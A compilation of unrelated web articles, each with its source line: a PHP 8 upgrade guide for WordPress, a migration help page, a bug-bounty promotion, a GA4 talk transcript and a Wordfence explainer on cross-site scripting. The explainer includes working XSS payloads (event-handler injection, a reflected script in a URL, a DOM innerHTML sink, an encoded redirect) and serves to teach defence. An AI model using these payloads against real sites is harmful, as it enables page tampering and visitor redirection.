PHP (a recursive acronym for PHP: Hypertext Preprocessor) is a popular open-source scripting language used by coders worldwide for web and application development. This high-level programming language is easy to learn, and hence preferred by beginners and novice coders, yet it is also powerful enough to cater to the needs of a professional programmer.

PHP 8.0 is the latest update of PHP and has come up with new features, functions, and methods to facilitate the developers and provide the best user experience.

Previously, PHP had released version 7.4 in November 2019, around the time support for PHP 7.1 ended. Support for the later 7.2 version was also discontinued with the release of 8.0. Currently, PHP supports only the 7.3, 7.4, and 8.0 versions.

PHP 8 Compatibility With WordPress

With every update come compatibility issues. If you want a hassle-free PHP 8.0 experience, we recommend running the latest WordPress version, or at least version 5.6.

Are you running your website on an older WordPress version but hesitant to upgrade for fear of errors? Don’t worry; you can test your website in a staging environment and then safely upgrade your live website to a newer WordPress version.

If you get any errors in the staging environment, then we’d recommend getting the help of a professional WordPress developer to diagnose and debug the errors before you move ahead with the update.

PHP 8 – Themes & Plugins Compatibility

Discomforts accompany every change, and PHP 8 is no exception. While PHP 8 offers extensive features to support its users and provide them with an ideal user experience, it can bring theme and plugin incompatibility issues.

PHP isn’t to blame here, as themes and plugins should be updated to work with the latest software versions. If your favorite and irreplaceable plugin or theme is causing problems with PHP 8, then try out the following solutions.

  1. Roll back to the previous PHP version. (A boring option.)
  2. Contact the theme or plugin’s support team and inform them about the compatibility issues so they can restore an optimal user experience with the latest versions of both.

PHP 8 on WordPress: Installation Prerequisites

Before upgrading to PHP 8.0, it’s wise to check the current PHP version that your WordPress site is running.
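
There are a few quick ways to check the current version, depending on your access; the second command below assumes WP-CLI is installed:

    php -v
    wp eval 'echo PHP_VERSION;'

WordPress 5.2 and later also displays the server's PHP version under Tools > Site Health > Info.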

Using an older version? You can upgrade the PHP version to enjoy the new features and improvements. But not so fast! Remember, safety always comes first. When we talk about security, we consider the “what ifs.”

What if your site is not compatible with the latest version, and you end up losing or corrupting your data in the process? Nope, you don’t want that.

Don’t lose hope; you can create a clone of your website to test it on the latest version.

If the clone website works smoothly after upgrading to PHP 8.0, you can move ahead with updating your actual site. This section lists the steps to create a clone website so you can test it under PHP 8.

Clone a Website via Your Web Hosting Provider

Fortunately, managed WordPress hosting solutions like Cloudways allow users to create a duplicate of their site without dealing with any complexities. Follow the steps below to create your website’s clone via Cloudways.

  • Log in to Cloudways with your credentials.
  • Select your server, and click the application that you want to clone.
  • Navigate to the bottom, and you will see an orange circle; click it.
  • Click Clone App/Create Staging from the pop-up.
  • Select your preferred server, then click Continue.

You will be asked to wait for a few minutes, during which Cloudways will copy your entire website. Now, you are good to experiment on the clone.

Note: Clone App and Create as Staging are different functionalities. Clicking Clone App will only clone your website, whereas Create as Staging will sync the live and staged applications to allow you to perform Push/Pull actions on both the replica and live versions.

How to Update PHP in WordPress to PHP 8.0 on Cloudways

Cloudways announced the availability of PHP 8 earlier this year, maintaining its reputation as an early adopter of the latest updates. Want to update your PHP version on Cloudways? Follow the easy steps below to upgrade your current PHP version to PHP 8.0.

Note: Cloudways recommends keeping a backup of your server before upgrading to a newer PHP version. Keeping a backup will help you restore your application if you feel the need to revert to your previous PHP version anytime in the future.

Log in with Cloudways

  • Sign up on Cloudways. Already have a Cloudways account? Log in with your credentials.

Select Server

  • Click on Servers, then select and click the server of your choice.

Select Settings & Packages

  • Click on Settings & Packages on the left side.
  • Click on the Packages tab.

Upgrade your PHP version

  • Click the edit icon next to your current PHP version.
  • Select PHP 8.0 from the drop-down, and click Save.
  • The setup will prompt you with a warning asking you to confirm that your application is compatible with the selected PHP version. If it is, click OK.

The setup will take a few minutes to finish, and it will notify you once the update is done. After getting the notification, you can enjoy working with PHP 8.

PHP Supported Versions on WordPress

WordPress supports the following seven PHP versions ranging from PHP 5.6 to the latest version 8.0.

  • PHP 5.6
  • PHP 7.0
  • PHP 7.1
  • PHP 7.2
  • PHP 7.3
  • PHP 7.4
  • PHP 8.0

Note: Keep in mind that you won’t receive PHP security updates once your PHP version reaches its end of life. We recommend using the 8.0 PHP version.

What Is Holding Back Users From Updating to PHP 8.0?

The major reason that’s holding back users from upgrading to PHP 8 is the incompatibility of their favorite themes and plugins with PHP 8.

That said, every savvy user would like to enjoy the latest PHP features and RFC improvements; only someone content to keep working with legacy software would abstain from upgrading their PHP version.

Using the latest PHP versions allows for better and easier development of new features and also facilitates maintenance. Even if some of the themes and plugins are not working on PHP 8.0, they will eventually be updated.

Why Should You Upgrade to PHP 8?

Imagine using an outdated image editing tool for making logos or editing photos. While the world has moved to the latest version and is saving time and getting better quality and performance with the latest edition, you are still doing it the old way. Not really a smart decision, right?

Similarly, why would anyone abstain from upgrading to a newer PHP version when the new upgrade is specifically introduced to make things easier for users? You should definitely upgrade to PHP 8 if you want to benefit from the latest features, better error handling, improved RFCs, and optimizations.

PHP 8 will remain in support till November 2022, and its security support will extend till November 2023. This longevity makes this newest version a lot more trustworthy and secure than the previous versions.

Most of the popular WordPress plugins and themes have accepted PHP 8 and are now compatible with it.

We ran a loader test to check PHP 8’s performance on a Cloudways server and observed the following results:


Source: Loader Test of PHP 8.0 on Cloudways Server

The average response time for the tested WordPress website was 164 ms, and the total success response count was 3,836.

Sadly, only 1.3% of WordPress sites are using PHP 8.0. In our experience, WordPress delivers its best performance with PHP 8.0, with better speeds than on previous PHP versions. It’s good practice to use the latest versions, and the number of people migrating from 7.4 to 8.0 is gradually increasing over time.


Source: WordPress Version Stats

PHP has worked on the issues reported by the users in the previous versions, and the latest version is free from many recurring problems and has introduced new features.

To enjoy these services at their full potential, you will have to upgrade to the newest WordPress-supported PHP version, as older versions will eventually fade out or be dropped by most themes and plugins.


Source: PHP Supported Versions

Disadvantages of Using Older PHP Versions on WordPress

All PHP versions before 7.3 have reached their end of life, and it is advised to upgrade to the latest version if you are using any of the older versions, as staying on them will leave you vulnerable to unpatched security errors. Even 7.4 will reach its end of life on November 28, 2022.

Why would you risk your website to security vulnerabilities when you can easily upgrade to the latest version and enjoy the new improvements and features?

Also, ensure that you opt for a secure WordPress hosting provider to safeguard your sites from malicious traffic, DDoS attacks, and malware.

Using older PHP versions won’t only create security issues; it will also affect your website’s performance.

Which sane person compromises performance in this competitive era, where everyone is following best practices to boost their site’s performance and gain their users’ attention?

Improve your website’s performance and security by halting the usage of older PHP versions, and upgrade your WordPress website’s PHP version to 8.0 to maximize safety and performance.

Final Thoughts

This blog covers PHP 8’s compatibility with WordPress and the steps to upgrade your PHP version to 8.0. The information shared in this guide will help you make the right decision to upgrade to PHP 8.0 on your WordPress site and enjoy the benefits of the newest update.

From the supported versions to the disadvantages of using an old PHP version and the reasons to upgrade to 8.0, we have tried to cover it all. Still, if any questions are popping up in your head, please feel free to comment with your queries, and we will answer all of them ASAP.

Frequently Asked Questions

Can WordPress use PHP 8?

Yes, WordPress can use PHP 8, and it is recommended to use PHP 8.0 with WordPress 5.6 or higher version for compatibility and better performance.
If you are using an older WordPress version, you can test your site with WordPress 5.6 in a staging environment. If you don’t experience any issues, then upgrade your live WordPress site to enjoy using PHP 8.0 on WordPress.

Is WordPress compatible with PHP 8?

Yes, WordPress is compatible with PHP 8.0. However, only WordPress 5.6 or higher versions are compatible with PHP 8. If you are using an older WordPress version, you can upgrade it to at least 5.6 to enjoy using PHP 8.

Should I upgrade to PHP 8?

Yes, if you want to benefit from the latest features, better error handling, improved RFCs, and optimizations, you should upgrade your PHP version to PHP 8.

What version of PHP should I use for WordPress?

We recommend using PHP 8.0 with WordPress if you are using at least WordPress 5.6. The oldest PHP version that we recommend using with WordPress is PHP 7.3.

Source:
https://www.cloudways.com/blog/wordpress-php-8/

Migrate WordPress from PHP 5 to PHP 7

If your website’s PHP version is not the same as the PHP version in your backup, it may cause issues with the proper operation of your website and with some applications. This is more common when migrating from PHP 5 to PHP 7.

We recommend that users regularly back up their WordPress sites or networks of sites. You can also use the All-in-One WP Migration plugin extensions to set up automatic backups. Make sure your plugin version is always up to date.
In most cases, the PHP update will have no effect on WordPress or popular plugins or themes. However, it is possible that some plugins, themes, or other functionalities will cease to function.

Set the WP_DEBUG constant to true in your wp-config.php file to see all errors, warnings, and notices generated by the website during execution. This will assist you in locating any problems.
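
The relevant lines in wp-config.php look like this (WP_DEBUG_LOG is optional and writes errors to wp-content/debug.log instead of displaying them on screen):

    define( 'WP_DEBUG', true );
    define( 'WP_DEBUG_LOG', true );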

If your install is stuck at “restoring X% files,” “restoring database,” or “activating mu-plugins”

1. Leave the plugin running for another 15 minutes while it is on “Restoring database.”
2. After 15 minutes, open another tab and attempt to log in to wp-admin using the exported site’s WP Admin username and password.
3. Save the permalinks structure twice by going to Settings -> Permalinks.
Your website should now be successfully migrated.

If it isn’t, and you receive a 500 error, edit your wp-config.php file and set WP_DEBUG to true, then refresh the page to see an error. This may assist you in determining the problem, or you can share the error with the ServMask support team for assistance.

Could it be my server settings?

The memory limit needs to be at 256M, max_execution_time at 500, and mysql.connect_timeout at 400. You can check these settings by uploading this file (https://www.dropbox.com/s/ize8t2k4nww5iq7/phpinfo.php?dl=0) to the wp-content directory of your imported site and then opening http://YOURDOMAINNAME.COM/wp-content/phpinfo.php. (Tip: use Ctrl+F to search the data that you get.)
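
If you control your own php.ini, the corresponding directives look like the following; the exact file location varies by host:

    memory_limit = 256M
    max_execution_time = 500
    mysql.connect_timeout = 400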

Source:
https://help.servmask.com/knowledgebase/migrate-wordpress-from-php-5-to-php-7/

Why Continuous Security Testing is a Must for Organizations Today

The global cybersecurity market is flourishing. Experts at Gartner predict that the end-user spending for the information security and risk management market will grow from $172.5 billion in 2022 to $267.3 billion in 2026.

One big area of spending includes the art of putting cybersecurity defenses under pressure, commonly known as security testing. MarketsandMarkets forecasts that the global penetration testing (pentesting) market will grow at a Compound Annual Growth Rate (CAGR) of 13.7% from 2022 to 2027. However, the costs and limitations involved in carrying out a penetration test are already hindering market growth, and consequently, many cybersecurity professionals are making moves to find an alternative solution.

Pentests aren’t solving cybersecurity pain points

Pentesting can serve specific and important purposes for businesses. For example, prospective customers may ask for the results of one as proof of compliance. However, for certain challenges, this type of security testing methodology isn’t always the best fit.

1 — Continuously changing environments

Securing constantly changing environments within rapidly evolving threat landscapes is particularly difficult. This challenge becomes even more complicated when aligning and managing the business risk of new projects or releases. Since penetration tests focus on one moment in time, the result won’t necessarily be the same the next time you make an update.

2 — Rapid growth

It would be unusual for fast-growing businesses not to experience growing pains. For CISOs, maintaining visibility of their organization’s expanding attack surface can be particularly painful.

According to HelpNetSecurity, 45% of respondents conduct pentests only once or twice per year and 27% do it once per quarter, which is woefully insufficient given how quickly infrastructure and applications change.

3 — Cybersecurity skills shortages

As well as limitations in budgets and resources, finding the available skillsets for internal cybersecurity teams is an ongoing battle. As a result, organizations don’t have the dexterity to spot and promptly remediate specific security vulnerabilities.

While pentests can offer an outsider perspective, often it is just one person performing the test. For some organizations, there is also an issue of trust when relying on the work of just one or two people. Sándor Incze, CISO at CM.com, gives his perspective:

“Not all pentesters are equal. It’s very hard to determine if the pentester you’re hiring is good.”

4 — Cyber threats are evolving

The constant struggle to stay up to date with the latest cyberattack techniques and trends puts organizations at risk. Hiring specialist skills for every new cyber threat type would be unrealistic and unsustainable.

HelpNetSecurity reported that for 71 percent of pentesters, a pentest takes between one week and one month to conduct. Then, more than 26 percent of organizations must wait between one and two weeks to get the test results, and 13 percent wait even longer than that. Given the fast pace of threat evolution, this waiting period can leave companies unaware of potential security issues and open to exploitation.

5 — Poor-fitting security testing solutions for agile environments

Continuous development lifecycles don’t align with penetration testing cycles (often performed annually). Therefore, vulnerabilities introduced during the long gaps between tests can remain undiscovered for some time.

Bringing security testing into the 21st century

A proven solution to these challenges is to utilize ethical hacker communities in addition to a standard penetration test. Businesses can rely on the power of these crowds to assist them in their security testing on a continuous basis. A bug bounty program is one of the most common ways to work with ethical hacker communities.

What is a bug bounty program?

Bug bounty programs allow businesses to proactively work with independent security researchers to report bugs through incentivization. Often companies will launch and manage their program through a bug bounty platform, such as Intigriti.

Organizations with high-security maturity may leave their bug bounty program open for all ethical hackers in the platform’s community to contribute to (known as a public program). However, most businesses begin by working with a smaller pool of security talent through a private program.

How bug bounty programs support continuous security testing structures

While you’ll receive a certificate to say you’re secure at the end of a penetration test, it won’t necessarily mean that’s still the case the next time you make an update. This is where bug bounty programs work well as a follow-up to pentests and enable a continuous security testing program.

The impact of bug bounty programs on cybersecurity

By launching a bug bounty program, organizations experience:

  1. More robust protection: Company data, brand, and reputation have additional protection through continuous security testing.
  2. Enabled business goals: Enhanced security posture, leading to a more secure platform for innovation and growth.
  3. Improved productivity: Fewer disruptions to the availability of services, and more time for the strategic IT projects that executives have prioritized, with fewer security “fires” to put out.
  4. Increased skills availability: Internal security team’s time is freed by using a community for security testing and triage.
  5. Clearer budget justification: Ability to provide more significant insights into the organization’s security posture to justify and motivate an adequate security budget.
  6. Improved relationships: Project delays significantly decrease without the reliance on traditional pentests.

Want to know more about setting up and launching a bug bounty program?

Intigriti is the leading European-based platform for bug bounty and ethical hacking. The platform enables organizations to reduce the risk of a cyberattack by allowing Intigriti’s network of security researchers to test their digital assets for vulnerabilities continuously.

If you’re intrigued by what you’ve read and want to know about bug bounty programs, simply schedule a meeting today with one of our experts.

www.intigriti.com

Source :
https://thehackernews.com/2022/09/why-continuous-security-testing-is-must.html

Top 4 Things to Know About GA4 — Whiteboard Friday

In this week’s Whiteboard Friday, Dana brings you some details on the exciting new world of Google Analytics 4. Watch and learn how to talk about it when clients and coworkers are intimidated by the move.

whiteboard outlining four insights into GA4

Video Transcription

Hi, my name is Dana DiTomaso. I’m President at Kick Point. And I am here today at MozCon 2022 to bring you some details on the exciting world of Google Analytics 4, which I know all of you are like, “Ugh, I don’t want to learn about analytics,” which is totally fair. I also did not want to learn about analytics.

And then I kind of learned about it whether I liked it or not. And you should, too, unfortunately. 

So I think the biggest thing about the move from Universal Analytics to GA4 is that people are like they log in and everything looks different. “I don’t like it.” And then they leave. And I agree the user interface in GA4 leaves a lot to be desired. I don’t think there’s necessarily been a lot of good education, especially for those of us who aren’t analysts on a day-to-day basis.

We’re not all data scientists. I’m not a data scientist. I do marketing. So what I’m hoping is I can tell you the things you should know about GA4 on just a basic sort of level, so that you have a better vocabulary to talk about it when people are horrified by the move to GA4, which is inevitable. It’s going to happen. You’ve got to get it on your site starting basically immediately, if you don’t already have it. So I started out with three things, and then I realized there was a fourth thing. So you get a bonus, exciting bonus, but we’ll start with the first three things. 

1. It’s different

So the first thing it’s different, which I know is obvious. Yes, of course, Dana it’s different. But it’s different. Okay, so in Universal Analytics, there were different types of hits that could go into analytics, which is where hits came from originally as a metric that people talked about. So, for example, in Universal Analytics, you could have a pageview, or you could have a transaction, or you could have an event.

And those were all different types of hits. In GA4, everything is an event. There is a pageview event. There is a transaction event. There is, well, an event event. I mean, you name the events whatever you want. And because of that, it’s actually a lot better way to report on your data.

So, for example, one of the things that I know people always wanted to be able to report on in Universal Analytics is what pages did people see and how did that relate to conversion rate. And that was really tricky because a pageview was something that was at the hit scope level, which means it was just like the individual thing that happened, whereas conversion rate is a session scoped thing.

So you couldn’t mash together a hit-scoped thing like pageview with conversion rate, which is session-scoped. They just didn’t combine together unless you did some fancy blending stuff in Data Studio. And who’s got time for that? So now in GA4, because everything is an event, you have a lot more freedom with how you can slice and dice and interpret your data and figure out what pages people engaged with before they actually converted, or what was that path, not just the landing page, but the entire user journey on their path to conversion. So that part is really exciting.

2. Engagement rate is not reverse bounce rate

Second thing, engagement rate is a new metric in GA4. They do have bounce rate. They did recently announce it. I’m annoyed at it, so we’re going to talk about this a little bit. Engagement rate is not reverse bounce rate. But it is in GA4.

So in Universal Analytics, bounce rate was a metric that people reported on all the time, even though they shouldn’t have. I hate bounce rate so much. Just picture like a dumpster fire GIF right now across your screen. I hate bounce rate. And why I hate bounce rate is it’s so easily faked. Let’s say, for example, your boss says to you, “Hey, you know what, the bounce rate on our site is too high. Could you fix it?”

You’re like, “Oh, yeah, boss. Totally.” And then what you do is whenever somebody comes on your website, you send what’s called an interactive event off to Google Analytics at the same time. And now you have a 0% bounce rate. Congratulations. You got a raise because you made it up. Bounce rate could absolutely be faked, no question. And so when we moved over to GA4, originally there was no bounce rate.

There was engagement rate. Engagement rate has its own issues, but it’s not measuring anything similar to what bounce rate was. Bounce rate in UA was an event didn’t happen. It didn’t matter if you spent an hour and a half on the page reading it closely. If you didn’t engage in an event that was an interactive event, that meant that you were still counted as a bounce when you left that page.

Whereas in GA4, an engaged session is by default someone spending 10 seconds with that tab, that website open, so active in their browser, or they visited two pages, or they had a conversion. Now this 10-second rule I think is pretty short. Ten seconds is not necessarily a lot of time for someone to be engaged with the website.

So you might want to change that. It’s under the tagging settings in your data stream. So if you go to Admin and then you click on your data stream and you go to more tagging settings and then you go to session timeouts, you can change it in there. And I would recommend playing around with that and seeing what feels right to you. Now GA4 literally just as I’m filming this has announced bounce rate, which actually it is reverse engagement rate. Please don’t use it.

Instead, think about engagement rate, which I think is a much more usable metric than bounce rate was in UA. And I’m kind of excited that bounce rate in UA is going away because it was [vocalization]. 

3. Your data will not match

All right. So next thing, your data is not going to match. And this is stressful because you’ve been reporting on UA data for years, and now all of a sudden it’s not going to match and people will be like, “But you said there were 101 users, and today you’re saying there were actually 102. What’s the problem?”

So, I mean, if you have that kind of dialogue with your leadership, you really need to have a conversation about the idea of accuracy in analytics, as in it isn’t, and error and everything else. But I mean, really the data is going to be different, and sometimes it’s a lot different. It’s not just a little bit different. And it’s because GA4 measures stuff differently than UA did. There is a page on Google Analytics Help, which goes into it in depth. But here are some of the highlights that I think you should really know sort of off the top of your head when you’re talking to people about this. 

Pageviews and unique pageviews

So first thing, a pageview metric, which we’re all familiar with, in Universal Analytics, this was all pageviews, including repeats. In GA4, same, pageview is pageview. Great.

So far so good. Then we had unique pageviews in Universal Analytics, which was only single views per session. So if I looked at the homepage and then I went to a services page and I went back to the homepage, I would have two pageviews of the homepage for pageview. I would have one pageview of the homepage in unique pageviews. That metric does not exist in GA4. So that is something to really watch for is that if you were used to reporting on unique pageviews, that is gone.

So I recommend now changing your reports to sort of like walk people through this comfort level of getting them used to the fact they’re not going to get unique pageviews anymore. Or you can implement something that I talk about in another one of my Whiteboard Fridays about being able to measure the percentage of people who are reloading tabs and tab hoarders. You could work that into this a little bit.

Users

Okay. Next thing is users. Users is really I think a difficult topic for a lot of people to get their heads around because they think, oh, user, that means that if I’m on my laptop and then I go to my mobile device, obviously I am one user. You’re usually not, unfortunately. You don’t necessarily get associated across multiple devices. Or if you’re using say a privacy-focused browser, like Safari, you may not even be associated in the same device, which kind of sucks.

The real only way you can truly measure if someone is a user across multiple sessions is if you have a login on your website, which not everybody does. A lot of B2B sites don’t have logins. A lot of small business sites don’t have logins. So users is already kind of a sketchy metric. And so unfortunately it’s one that people used to report on a lot in Universal Analytics.

So in Universal Analytics, users was total users, new versus returning. In GA4, it’s now active users. What is an active user? The documentation is a little unclear on how Google considers an active user. So I recommend reading that in depth. Just know that this is going to be different. You never should have been reporting on new versus returning users anyway, unless you had a login on your site because it was such a sketchy, bad metric, but I don’t think a lot of people knew how bad it was.

It’s okay. Just start changing your reports now so that when you have to start using GA4 on July 1, 2023 (for real, UA is done then), at least it’s not so much of a shock when you do make that transition.

Sessions

So one other thing to think about as well with the changes is sessions. So in Universal Analytics, a session was the active use of a site, so you’re clicking on stuff.

It had a 30-minute timeout. And you may have heard never to use UTM tags on internal links on your website. And the reason why is because if someone clicked on an internal link on your website that had UTMs on it, your session would reset. And so you would have what’s called session breaking, where all of a sudden you would have a session that basically started in the middle of your website with a brand-new campaign and source and medium and completely detached from the session that they just had.

They would be a returning user though. That’s great. You shouldn’t have been reporting that anyway. Whereas in GA4 instead, now there’s an event because, remember, everything is an event now. There is an event that is called session start. And so that records when, well, the session starts. And then there’s also a 30-minute timeout, but there is no UTM reset.

Now that doesn’t mean that you should go out there and start using UTMs on internal links. I still don’t think it’s a great idea, but it’s not necessarily going to break things the way that it used to. So you can now see where did someone start on my site by looking at the session start event. I don’t know if it’s necessarily 100% reliable. We’ve seen situations where if you’re using consent management tools, for example, like a cookie compliance tool, you can have issues with sessions starting and whatnot.

So just keep that in mind is that it’s not necessarily totally foolproof, but it is a really interesting way to see where people started on the site in a way that you could not do this before. 

4. Use BigQuery

So bonus, bonus before we go. All right, the fourth thing that I think you should know about GA4, use BigQuery. There’s a built-in BigQuery export under the settings for GA4. Use it.

The reason why you should use it is: (a) the reports in GA4 are not great, the default reports, they kind of suck; (b) even the explorations are a bit questionable, like you can’t really format them to look nice at all. So what I’m saying to people is don’t really use the reports inside GA4 for any sort of useful reporting purposes. It’s more like an ad hoc reporting. But even then, I would still turn to BigQuery for most of my reporting needs.

And the reason why is because GA4 has some thresholding applied. So you don’t necessarily get all the data out of GA4 when you’re actually looking at reports in it. And this happened to me actually just this morning before I recorded this Whiteboard Friday. I was looking to see how many people engaged with the form on our website, and because it was a relatively low number, it said zero.

And then I looked at the data in BigQuery and it said 12. That amount could be missing from the reports in GA4, but you can see it in BigQuery, and that’s because of the thresholding that’s applied. So I always recommend using the BigQuery data instead of the GA4 data. And in Google Data Studio, if that’s what you use for your reporting tool, the same issue applies when you use GA4 as a data source.

You have the same thresholding problems. So really just use BigQuery. And you don’t need to know BigQuery. All you need to do is get the data going into BigQuery and then open up Google Data Studio and use that BigQuery table as your data source. That’s really all you need to know. No SQL required. If you want to learn it, that’s neat.

I don’t even know it that well yet. But it is not something you have to know in order to report well on GA4. So I hope that you found this helpful and you can have a little bit more of a better dialogue with your team and your leadership about GA4. I know it seems rushed. It’s rushed. Let’s all admit it’s rushed, but I think it’s going to be a really good move. I’m really excited about the new kinds of data and the amounts of data that we can capture now in GA4.

It really frees us from like the category action label stuff that we were super tied to in Universal Analytics. We can record so much more interesting data now on every event. So I’m excited about that. The actual transition itself might be kind of painful, but then a year from now, we’ll all look back and laugh, right? Thank you very much.

Video transcription by Speechpad.com

About Dana DiTomaso —

Dana is a partner at Kick Point, where she applies marketing strategies to grow clients’ businesses, in particular ensuring that digital and traditional play well together. With her deep experience in digital, Dana can separate real solutions from wastes of time (and budget).

Source :
https://moz.com/blog/top-things-to-know-about-ga4-whiteboard-friday

Cross-Site Scripting: The Real WordPress Supervillain

Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal, with some allowing access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can provide a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.

XSS exploit attempts blocked per day

What is Cross-Site Scripting?

Cross-Site Scripting is a type of vulnerability that allows a malicious actor to inject code, usually JavaScript, into otherwise legitimate websites. The web browser being used by the website user has no way to determine that the code is not a legitimate part of the website, so it displays content or performs actions directed by the malicious code. XSS is a relatively well-known type of vulnerability, partially because some of its uses are visible on an affected website, but there are also “invisible” uses that can be much more detrimental to website owners and their visitors.

Without breaking XSS down into its various uses, there are three primary categories of XSS that each have different aspects that could be valuable to a malicious actor. The types of XSS are split into stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.

Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location where the script is rendered, the stored exploit will be executed in their browser.

An example of an authenticated stored XSS vulnerability can be found in version 4.16.5 or older of the Leaky Paywall plugin. This vulnerability allowed code to be entered into the Thousand Separator and Decimal Separator fields and saved in the database. Any time this tab was loaded, the saved code would load. For this example, we used the JavaScript onmouseover event handler to run the injected code whenever the mouse went over the text box, but this could easily be modified to onload to run the code as soon as the page loads, or even onclick so it would run when a user clicks a specified page element. The vulnerability existed due to a lack of proper input validation and sanitization in the plugin’s class.php file. While we have chosen a less-severe example that requires administrator permissions to exploit, many other vulnerabilities of this type can be exploited by unauthenticated attackers.
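
As an illustration of the technique (the exact markup is an assumption; it depends on how the plugin renders the field), a payload of this kind might break out of the stored value attribute and attach an event handler:

" onmouseover="alert(document.domain)

If the settings page later echoes the saved value into an input tag without escaping, the injected attribute executes in the administrator’s browser.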

Example of stored XSS

Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.

This type of exploit is relatively common in WordPress, with malicious actors taking advantage of aspects of the site that provide data in the administrator panel. One such vulnerability was exploitable in version 13.1.5 or earlier of the WP Statistics plugin, which is designed to provide information on website visitors. If the Cache Compatibility option was enabled, then an unauthenticated user could visit any page on the site and grab the _wpnonce from the source code, and use that nonce in a specially crafted URL to inject JavaScript or other code that would run when statistics pages are accessed by an administrator. This vulnerability was the result of improper escaping and sanitization on the ‘platform’ parameter.

Example of blind XSS

Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. The exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, and error messages to return data back in the browser, or send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website will incorporate that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful and it’s worth noting that the payload is never stored on the server so the chance of success relies on the initial interaction with the user.

In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed for simple page modification merely by crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found,” as this is a common error message that will not likely cause alarm but could entice a victim to click on the redirect link that will trigger the pop-up.
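
A crafted link of this general shape illustrates how a reflected payload rides in on a URL parameter (victim.example and the exact parameter handling are placeholders, not the actual proof of concept):

https://victim.example/?site_url="><script>alert('404 Page Not Found')</script>

The vulnerable page reflects the parameter into its output, so the script executes once in the browser of whoever opens the link.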

Example of reflected XSS

DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.
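
A generic sketch of the pattern (not Elementor’s actual code, which is discussed below) shows why the server never sees the payload: the vulnerable JavaScript reads attacker-controlled input from the URL fragment and writes it straight into the page:

// Vulnerable pattern: the URL fragment never reaches the server
// e.g. https://site.example/page#<img src=x onerror=alert(document.domain)>
var payload = decodeURIComponent(location.hash.substring(1));
document.getElementById('greeting').innerHTML = 'Hello ' + payload; // unsafe sink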

One example of a DOM-based vulnerability can be found in versions older than 3.4.4 of the Elementor page builder plugin. This vulnerability allowed unauthenticated users to inject JavaScript code into pages that had been edited using either the free or Pro versions of Elementor. The vulnerability was in the lightbox settings, with the payload formatted as JSON and encoded in base64.

Example of DOM-based XSS

How Does Cross-Site Scripting Impact WordPress Sites?

WordPress websites can suffer a number of repercussions from Cross-Site Scripting (XSS) vulnerabilities. Because WordPress websites are dynamically generated on page load, content is updated and stored within a database. This can make it easier for a malicious actor to exploit a stored or blind XSS vulnerability on the website, which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.

Using Cross-Site Scripting to Manipulate Websites

One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of the malicious actor.

When testing for XSS vulnerabilities, security researchers often use a simple method such as alert(), prompt(), or print() in order to test whether the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:
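
A typical proof-of-concept payload is a one-liner along these lines (a generic example, not necessarily the one pictured below):

<script>alert(document.domain)</script>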

Example of XSS popup

This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.

One common type of XSS payload we see when our team performs site cleanings is a redirect. As previously mentioned, XSS vulnerabilities can utilize JavaScript to get the browser to perform actions. In this case an attacker can utilize the window.location.replace() method or another similar method in order to redirect the victim to another site. This can be used by an attacker to redirect a site visitor to a separate malicious domain that could be used to further infect the victim or steal sensitive information.

In this example, we used onload=location.replace("https://wordfence.com") to redirect the site to wordfence.com. The use of onload means that the script runs as soon as the element of the page that the script is attached to loads. Generating a specially crafted URL in this manner is a common method used by threat actors to get users and administrators to land on pages under the actor’s control. To further hide the attack from a potential victim, the use of URL encoding can modify the appearance of the URL to make it more difficult to spot the malicious code. This can even be taken one step further in some cases by slightly modifying the JavaScript and using character encoding prior to URL encoding. Character encoding helps bypass certain character restrictions that may prevent an attack from being successful without first encoding the payload.
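
For example, URL encoding the payload just described changes its appearance without changing what the browser ultimately executes (an illustrative sketch):

Plain:   <body onload=location.replace("https://wordfence.com")>
Encoded: %3Cbody%20onload%3Dlocation.replace(%22https%3A%2F%2Fwordfence.com%22)%3E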

Example of XSS redirect

